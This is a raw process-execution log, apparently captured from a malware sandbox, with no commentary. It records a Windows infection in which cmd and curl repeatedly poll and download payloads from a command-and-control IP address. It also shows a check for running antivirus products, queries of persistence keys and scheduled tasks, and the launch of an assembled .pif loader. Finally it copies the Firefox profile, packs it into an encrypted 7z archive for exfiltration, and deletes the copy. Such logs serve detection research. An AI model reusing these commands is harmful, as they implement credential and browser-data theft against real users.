curl -s -o "C:\Users\Admin\AppData\Local\temp\eaonl" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nqpzx" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\nqpzx" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xvwoz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xvwoz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xjpyn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xjpyn" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o xhwq.zip

C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe

azvw.exe -o xhwq.zip

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mfiuw" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\mfiuw" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\khxas" "178.215.224.74/v10/ukyh.php?jspo=31"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\khxas" "178.215.224.74/v10/ukyh.php?jspo=31"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\Admin\AppData\Roaming\DolphinDumps\jvx 2>&1

C:\Windows\SysWOW64\systeminfo.exe

systeminfo

C:\Windows\SysWOW64\findstr.exe

findstr /C:"OS Name"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\mfjsk" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\mfjsk" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gnaze" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\gnaze" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wasxo" "178.215.224.74/v10/ukyh.php?jspo=7"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\wasxo" "178.215.224.74/v10/ukyh.php?jspo=7"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xiaij" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xiaij" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bhgyc" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bhgyc" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kypzx" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\kypzx" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lmhjs" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\lmhjs" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nbpfi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\nbpfi" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"

C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe

"C:\Users\Admin\AppData\Local\temp\RevenueDevices.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fujps" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\fujps" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dqxiv" "178.215.224.74/v10/ukyh.php?gi"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\dqxiv" "178.215.224.74/v10/ukyh.php?gi"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\yisgz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\yisgz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kpsan" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\kpsan" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sfqfo" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\sfqfo" "178.215.224.74/v10/ukyh.php?jspo=33&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bdips" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bdips" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ulwhl" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ulwhl" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wltty" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\wltty" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\cuevq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\cuevq" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\iosjd" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\nqwgb" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\nqwgb" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\iosjd" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrqd" "178.215.224.74/v10/ukyh.php?gi"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrqd" "178.215.224.74/v10/ukyh.php?gi"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ikvhz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ikvhz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tbgpi" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tbgpi" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vnufs" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\vnufs" "178.215.224.74/v10/ukyh.php?jspo=3&jwvs=3A78C5703B2D9750556C36A3F42A4C&vprl=2"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr /I "wrsa opssvc"

C:\Windows\SysWOW64\tasklist.exe

tasklist

C:\Windows\SysWOW64\findstr.exe

findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"

C:\Windows\SysWOW64\cmd.exe

cmd /c md 303482

C:\Windows\SysWOW64\findstr.exe

findstr /V "OVERTOOLBARALOTNHL" Weeks

C:\Windows\SysWOW64\cmd.exe

cmd /c copy /b ..\Norman + ..\Eight + ..\Considerations + ..\Bailey + ..\Parts + ..\Showcase + ..\Samples + ..\Shepherd + ..\Subsection f

C:\Users\Admin\AppData\Local\Temp\303482\Either.pif

Either.pif f

C:\Windows\SysWOW64\choice.exe

choice /d y /t 5

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\gqaqc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\gqaqc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\soksi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\soksi" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\kyngx" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\kyngx" "178.215.224.252/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\dcnxf" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\dcnxf" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vghme" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\vghme" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\zimxc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\zimxc" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\insay" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\insay" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xgcrd" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xgcrd" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\bwzkv" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\bwzkv" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tapmx" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tapmx" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C cd "C:\Users\Admin\AppData\Roaming\DolphinDumps" & azvw.exe -o qyup.zip

C:\Users\Admin\AppData\Roaming\DolphinDumps\azvw.exe

azvw.exe -o qyup.zip

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lnntu" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\lnntu" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\rxhjz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\rxhjz" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\pcmfo" "178.215.224.74/v10/ukyh.php?jspo=8"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\pcmfo" "178.215.224.74/v10/ukyh.php?jspo=8"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\smoqi" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\fbjwi" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\fbjwi" "178.215.224.74/v10/ukyh.php?jspo=2021&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\wziuy" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\wziuy" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\xbwcs" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\xbwcs" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264

C:\Windows\SysWOW64\Robocopy.exe

robocopy "C:\Users\Admin\AppData\Roaming\Mozilla\Firefox" "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy" /E /XF *.lock favicons.sqlite favicons.sqlite-shm favicons.sqlite-wal /XD "Background Tasks Profiles" "Pending Pings" "Crash Reports" bookmarkbackups browser-extension-data features personality-provider settings crashes datareporting extensions minidumps saved-telemetry-pings security_state sessionstore-backups storage weave gmp-widevinecdm gmp-gmpopenh264

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vlkbr" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\vlkbr" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"

C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe

C:\Users\Admin\AppData\Roaming\DolphinDumps\7za.exe a "C:\Users\Admin\AppData\Roaming\DolphinDumps\3A78C5703B2D9750556C36A3F42A4C_ff.7z" -mhe=on "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ixmow" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ixmow" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrew" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\tfrew" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\hjnsq" "178.215.224.74/v10/ukyh.php?jspo=3002&melq=9367d48999a86f6e28935bc65a369c9f*6&jwvs=3A78C5703B2D9750556C36A3F42A4C"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C rd /s /q "C:\Users\Admin\AppData\Roaming\Mozilla\Firefoxcopy\"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\vwmok" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\vwmok" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\sgckt" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=3A78C5703B2D9750556C36A3F42A4C&bsxa=1"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\sgckt" "178.215.224.74/v10/ukyh.php?jspo=2016&jwvs=3A78C5703B2D9750556C36A3F42A4C&bsxa=1"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\reg.exe

REG QUERY HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\reg.exe

reg query HKEY_CURRENT_USER\Environment /v UserInitMprLogonScript

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /QUERY /TN MyTasks\DolphinDumps

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\lblct" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\lblct" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\hoyea" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\hoyea" "178.215.224.74/v10/ukyh.php?jspo=1&jwvs=3A78C5703B2D9750556C36A3F42A4C&zjyp=true&yuvc=false&nzrj=00000&sftb=true"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\ejbkr" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\ejbkr" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\Admin\AppData\Local\temp\stqti" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\curl.exe

curl -s -o "C:\Users\Admin\AppData\Local\temp\stqti" "178.215.224.74/v10/ukyh.php?jspo=6"

C:\Windows\SysWOW64\cmd.exe

